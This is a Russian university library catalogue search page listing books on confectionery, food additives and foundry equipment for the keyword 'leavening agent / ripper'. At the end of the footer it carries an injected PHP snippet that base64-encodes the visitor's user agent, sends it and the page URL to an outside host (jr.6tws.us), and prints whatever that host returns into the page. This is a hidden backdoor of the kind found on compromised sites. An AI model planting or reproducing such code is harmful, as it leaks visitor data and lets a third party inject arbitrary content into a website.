Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

282 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=РАЗРЫХЛИТЕЛЬ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 20
1. 
Бутейкис Н. Г. Технология приготовления мучных кондитерских изделий [Текст] : учебник / Н. Г. Бутейкис, 2012. - 335 с.
Держатели документа (Информация об экземплярах) 
2. 
Барановский В. А. Кондитер [Текст] : учеб. пособие для уч-ся колледжей и сред. проф.-тех. училищ / В. А. Барановский, 2000. - 318 с.
Держатели документа (Информация об экземплярах) 
3. 
Бутейкис Н. Г. Технология приготовления мучных кондитерских изделий [Текст] : учебник / Н. Г. Бутейкис, А. А. Жукова, 2007. - 300 с.
Держатели документа (Информация об экземплярах) 
4. 
Шестакова Т. И. Кондитер-профессионал [Текст] : учеб. пособие / Т. И. Шестакова, 2006. - 399 с.
Ключевые слова 
МУКА ПШЕНИЧНАЯ -- МУКА СОЕВАЯ -- МУКА кукурузная -- КРАХМАЛ -- глюкоза -- фруктоза -- ПОДСЛАСТИТЕЛЬ -- патока крахмальная -- МЕД -- МОЛОКО -- ПРОДУКТЫ МОЛОЧНЫЕ -- МАСЛО СЛИВОЧНОЕ -- ЖИРЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ПРОДУКТЫ ВКУСОВЫЕ -- КИСЛОТА ПИЩЕВАЯ -- ВЕЩЕСТВА АРОМАТИЧЕСКИЕ -- РАЗРЫХЛИТЕЛЬ -- ФРУКТЫ -- ЦУКАТЫ -- КРУПА -- ОРЕХИ -- МАК -- УЛУЧШИТЕЛЬ хлебобулочных изделий -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- СЛИВКИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ФАРШ -- ТЕСТО дрожжевое -- КУЛИЧИ -- БАБА РОМОВАЯ -- ТЕСТО бездрожжевое -- ВАТРУШКА -- ТЕСТО ПРЯНИЧНОЕ -- ТЕСТО ПЕСОЧНОЕ -- БИСКВИТ -- ТЕСТО ЗАВАРНОЕ -- ТЕСТО СЛОЕНОЕ -- волованы -- ФРИТЮР -- ПЕЧЕНЬЕ -- КЕКС -- ПИЦЦА -- СЛАДОСТИ ВОСТОЧНЫЕ -- СИРОП -- помадка -- ГЛАЗУРИ -- мастика -- КАРАМЕЛЬ -- кандир для сахарных фигур -- грильяж -- ЖЕЛЕ -- марципан -- ШОКОЛАД -- посыпки -- КРЕМ -- ПИРОЖНЫЕ -- ТОРТЫ
Держатели документа (Информация об экземплярах) 
5. 
Пашук З. Н. Мучные кондитерские изделия [Текст] / З. Н. Пашук, Т. К. Апет, 1997. - 459 с.
Ключевые слова 
ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОИЗВОДСТВО КОНДИТЕРСКОЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- МУКА -- КРАХМАЛ -- САХАР -- МЕД -- ПАТОКА -- ЯЙЦА -- МОЛОКО -- МАСЛО -- МАРГАРИН -- ЖИР -- ФРУКТЫ -- ЯГОДЫ -- РАЗРЫХЛИТЕЛЬ ТЕСТА -- ДОБАВКА АРОМАТИЧЕСКАЯ -- ДОБАВКА ВКУСОВАЯ -- ОРЕХИ -- МАК -- ПЕЧЕНЬЕ САХАРНОЕ -- ПЕЧЕНЬЕ ЗАТЯЖНОЕ -- ПЕЧЕНЬЕ СДОБНОЕ -- ГАЛЕТЫ -- КРЕКЕР -- ВЫПЕЧКА ПЕЧЕНЬЯ -- ПРЯНИК -- КЕКС -- БАБА РОМОВАЯ -- ТОРТ -- СИРОП -- ПОМАДА -- КАРАМЕЛЬ -- КАНДИР ДЛЯ САХАРНЫХ ФИГУР -- КРЕМ -- МАРЦИПАН -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ - ТРЕБОВАНИЯ САНИТАРНЫЕ -- ПРАВИЛА ЛИЧНОЙ ГИГИЕНЫ -- СРЕДСТВА МОЮЩИЕ -- СРЕДСТВА ДЕЗИНФИЦИРУЮЩИЕ -- ОСМОТР МЕДИЦИНСКИЙ ЕЖЕСМЕННЫЙ -- ЛАМПА БАКТЕРИЦИДНАЯ
Держатели документа (Информация об экземплярах) 
6. 
Дубцов Г. Г. Товароведение продовольственных товаров [Текст] / Г. Г. Дубцов, 2014. - 333 с.
Ключевые слова 
ТОВАРЫ ПРОДОВОЛЬСТВЕННЫЕ -- ТОВАРОВЕДЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- КАЧЕСТВО ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЦЕННОСТЬ ФИЗИОЛОГИЧЕСКАЯ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ЗЕРНО -- МУКА -- КРУПА -- ИЗДЕЛИЯ МАКАРОННЫЕ -- СОЛОД -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- КОРНЕПЛОДЫ -- ОВОЩИ -- ПЛОДЫ -- САХАР -- КРАХМАЛ -- МЕД -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОДУКТЫ ВКУСОВЫЕ -- НАПИТОК АЛКОГОЛЬНЫЙ -- ПИВО -- КВАС -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- ЧАЙ -- КОФЕ -- ПРЯНОСТИ -- МОЛОКО -- СЛИВКИ -- КОНСЕРВЫ МОЛОЧНЫЕ -- МОЛОКО СУХОЕ -- ПРОДУКТЫ КИСЛОМОЛОЧНЫЕ -- СЫР -- МАСЛО КОРОВЬЕ -- МЯСО -- ИЗДЕЛИЯ КОЛБАСНЫЕ -- МЯСОКОПЧЕНОСТИ -- КОНСЕРВЫ МЯСНЫЕ -- РЫБА -- МОРЕПРОДУКТЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ЖИР ПИЩЕВОЙ -- МАРГАРИН -- РАЗРЫХЛИТЕЛЬ ТЕСТА -- ДРОЖЖИ -- ВОДА -- УПАКОВКА -- ПОСУДА ОДНОРАЗОВАЯ
Держатели документа (Информация об экземплярах) 
7. 
Кондитерское и хлебопекарное производство. - Журнал, 2006г. № 9
Оглавление 
  • Использование околоплодной оболочки кедрового ореха при производстве хлебобулочных изделий / ; Е. Ю. Егорова, М. А. Доровских, Р. Ю. Митрофанов, Г. Ю. Бахтин. - с.4-5
  • Цыганова, Т. Б. Новый разрыхлитель для мучных кондитерских изделий / Т. Б. Цыганова, А. В. Козлова. - с.12-13
    Кл. слова: РАЗРЫХЛИТЕЛЬ ТЕСТА
Держатели документа (Информация об экземплярах) 
8. 
Четверикова, Ольга Петровна. Сырье и ингредиенты хлебопекарного и кондитерского производства [Текст] / О. П. Четверикова, 2018. - 666 с.
Ключевые слова 
СПРАВОЧНИК -- ПШЕНИЧНАЯ -- МУКА -- РЖАНАЯ -- КРУПА -- ХЛОПЬЯ -- САХАР -- СИРОП -- ПАТОКА -- ГЛЮКОЗА -- ДЕКСТРОЗА -- ФРУКТОЗА -- ЛАКТОЗА -- МЕД -- ЖИР -- МАСЛО -- ВОДА -- ДРОЖЖИ -- ЗАКВАСКА -- МОЛОКО -- ТВОРОГ -- ИЗОЛЯТ -- ЯЙЦО -- КРАХМАЛ -- ПОДСЛАСТИТЕЛЬ -- САХАРОЗАМЕНИТЕЛЬ -- РАЗРЫХЛИТЕЛЬ -- УЛУЧШИТЕЛЬ -- ФЕРМЕНТ -- КЛЕЙКОВИНА -- БЕЛОК -- СОЛЬ -- ЭМУЛЬГАТОР -- АНТИОКСИДАНТ -- ГИДРОКОЛЛОИДЫ -- ПИЩЕВОЕ -- ВОЛОКНО -- КЛЕТЧАТКА -- ФРУКТЫ -- ЯГОДЫ -- СУХОФРУКТЫ -- ЦУКАТЫ -- ОРЕХ -- КУНЖУТ -- СОЛОД -- КАКАО -- КРАСИТЕЛЬ
Держатели документа (Информация об экземплярах) 
9. 
Бутейкис, Нина Григорьевна. Технология приготовления мучных кондитерских изделий [Текст] / Н. Г. Бутейкис ; дар. В. В. Арсеньев, 2009. - 300, [1] с.
Держатели документа (Информация об экземплярах) 

Приведены сведения о сырье, предназначенном для изготовления хлебобулочных и кондитерских изделий, фаршей, кремов и различных полуфабрикатов, его подготовке и рациональном использовании, а также об изготовлении полуфабрикатов и готовых изделий и их отделке. Рассмотрена технология приготовления разнообразных хлебобулочных и кондитерских изделий, фаршей, кремов и полуфабрикатов, в том числе фирменных изделий из разных видов теста на предприятиях общественного питания.

В 7-е издание внесены изменения и дополнения, касающиеся использования в кондитерском производстве новых видов сырья и технологий новых изделий, по состояниию на 1 апреля 2008 г.

Для учащихся образовательных учреждений начального профессионального образования.

10. 
Исупов В. П. Пищевые добавки и пряности [Текст] : История, состав и применение / В. П. Исупов, 2000. - 166,[3] с.
Оглавление 
  • СанПиН 2.3.2.560-96. Список пищевых добавок, разрешенных к применению при производстве пищевых продуктов. - с.150-167
Держатели документа (Информация об экземплярах) 
11. 
Пищевые добавки [Текст] : Энциклопедия / Авт.-сост. Л. А. Сарафанова, 2003. - 684 с.
Оглавление 
  • СанПин 2.3.2.1078-01. Пищевые добавки, не оказывающие вредного воздействия на здоровье человека при использовании для изготовлениия пищевых продуктов. - с.639-655
  • Об ароматических веществах, используемых в пищевых продуктах. - с.656-660
Держатели документа (Информация об экземплярах) 
12. 
Окромешко, Николай Васильевич. Механизация и автоматизация литейных цехов [Текст] : учеб. пособие для техникумов / Н. В. Окромешко, 1960. - 414 с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ -- ФОРМОВОЧНЫЙ -- МАТЕРИАЛ -- ШИХТА -- ВАГРАНКА -- ЗАГРУЗКА -- СТАЛЕПЛАВИЛЬНАЯ -- МАРТЕНОВСКАЯ -- КОВШ -- ШЛАК -- МАГНИЙ -- СТЕРЖНЕВАЯ -- СМЕСЬ -- ЛЕНТОЧНЫЙ -- КОНВЕЙЕР -- ЭЛЕВАТОР -- ПЛАСТИНЧАТЫЙ -- СКРЕБКОВЫЙ -- ТРАНСПОРТЕР -- ЛОПАСТНЫЙ -- ПИТАТЕЛЬ -- СУШИЛА -- ПЕСОК -- ШАРОВАЯ -- МЕЛЬНИЦА -- РАЗРЫХЛИТЕЛЬ -- ОТРАБОТАННЫЙ -- РЕГЕНЕРАЦИЯ -- ФОРМОВКА -- СТЕРЖЕНЬ -- УПЛОТНЕНИЕ -- ОПОКА -- ТРАВЕРСЫ -- ПРЕССОВАНИЕ -- ВСТРЯХИВАЮЩАЯ -- АРМАТУРА -- ПЕСКОМЕТ -- АВТОМАТ -- ОБОЛОЧКОВАЯ -- ФОРМА -- ТОЧНОЕ -- ЛИТЬЕ -- ВЫБИВКА -- ОЧИСТКА -- ОТЛИВКА -- УДАЛЕНИЕ -- ЛИТНИК -- ПРИБЫЛИ -- ДРОБЕСТРУЙНЫЙ -- ДРОБЕМЕТНАЯ -- ОБДИРКА -- ЗАУСЕНЕЦ -- НЕРОВНОСТЬ -- МЕТАЛЛИЧЕСКАЯ -- ЦВЕТНОЙ -- СПЛАВ -- ДАВЛЕНИЕ -- ЦЕНТРОБЕЖНОЕ -- ПЫЛЕВЫДЕЛЕНИЕ -- БЕЗОПАСНОСТЬ
Держатели документа (Информация об экземплярах) 
13. 
Аксенов, Павел Николаевич. Оборудование литейных цехов [Текст] : учеб. для вузов по специальности "Машины и технология литейного производства" / П. Н. Аксенов, 1968. - 458 с.
Держатели документа (Информация об экземплярах) 
14. 
Литвин Д. М.Технология, материалы и оборудование для литейного производства [Текст] : ИНТЕРЛИТМАШ-73. Разд. 2 : Смесеприготовительные системы и оборудование : обзор, 1974. - 60 с.
Держатели документа (Информация об экземплярах) 
15. 
Литейные машины [Текст] : каталог / НИИМАШ. Вып. 1 : Машины для приготовления формовочных материалов и смесей, 1967. - 56, [1] с.
Держатели документа (Информация об экземплярах) 
16. 
Аксенов Н. П.Оборудование литейных цехов [Текст] : учеб. для втузов. Т. 1, 1949. - 316 с.
Держатели документа (Информация об экземплярах) 
17. 
Бутейкис Н. Г. Технология приготовления мучных кондитерских изделий [Текст] : Учеб. / Н. Г. Бутейкис, А. А. Жукова, 2003. - 300 с.
Держатели документа (Информация об экземплярах) 
18. 
Голубев В. Н. Пищевые и биологически активные добавки [Текст] : Учеб. для студ. вузов / В. Н. Голубев, Л. В. Чичева-Филатова,Т. В. Шленская, 2003. - 201 с.
Держатели документа (Информация об экземплярах) 
19. 
Барановский В. А. Кондитер [Текст] : Учеб. пособие для уч-ся проф. лицеев и училищ / В. А. Барановский, Т. И. Перетятко, 2003. - 381 с.
Держатели документа (Информация об экземплярах) 
20. 
Типовые укрупненные нормы времени на работы по ремонту литейного оборудования (по видам ремонта) [Текст] / Центр. бюро нормативов по труду Гос. комитета СССР по труду и соц. вопр., 1988. - 26, [2] с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2812 - 20.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.04 с.14 запросов, 0.67c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;